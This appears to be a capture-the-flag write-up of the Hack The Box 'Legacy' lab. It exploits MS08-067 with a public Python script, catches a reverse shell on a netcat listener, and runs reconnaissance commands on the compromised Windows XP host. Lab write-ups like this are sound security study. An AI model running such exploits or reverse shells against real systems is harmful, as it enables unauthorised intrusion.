Remote Code Execution
the target system is confirmed to be vulnerable to [[legacy_cve-2008-4250#cve-2008-4250 / MS08-067|CVE-2008-4250 (MS08-067)]]
┌──(kali㉿kali)-[~/…/htb/labs/legacy/ms08_067]
└─$ python2 ms08_067_2018.py -h
#######################################################################
# MS08-067 Exploit
# this is a modified verion of debasis mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# mod in 2018 by andy acer:
# - Added support for selecting a target port at the command line.
# It seemed that only 445 was previously supported.
# - Changed library calls to correctly establish a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
# into this source file.
#######################################################################
usage: ms08_067_2018.py <target ip> <os #> <Port #>
example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
also: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1According to the manual, I am supposed to provide 6 as an argument as the target system appears to be Windows XP SP3
┌──(kali㉿kali)-[~/…/htb/labs/legacy/ms08_067]
└─$ python2 ms08_067_2018.py $IP 6 445
#######################################################################
# MS08-067 Exploit
# this is a modified verion of debasis mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# mod in 2018 by andy acer:
# - Added support for selecting a target port at the command line.
# It seemed that only 445 was previously supported.
# - Changed library calls to correctly establish a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
# into this source file.
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finishLaunching the exploit
┌──(kali㉿kali)-[~/…/htb/labs/legacy/ms08_067]
└─$ nnc 62000
listening on [any] 62000 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\WINDOWS\system32> whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
c:\WINDOWS\system32> hostname
hostname
legacy
c:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ip address. . . . . . . . . . . . : 10.10.10.4
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : 10.10.10.2Initial Foothold established to the target system, but the whoami.exe binary is not available.
This is much expected in Windows XP by default.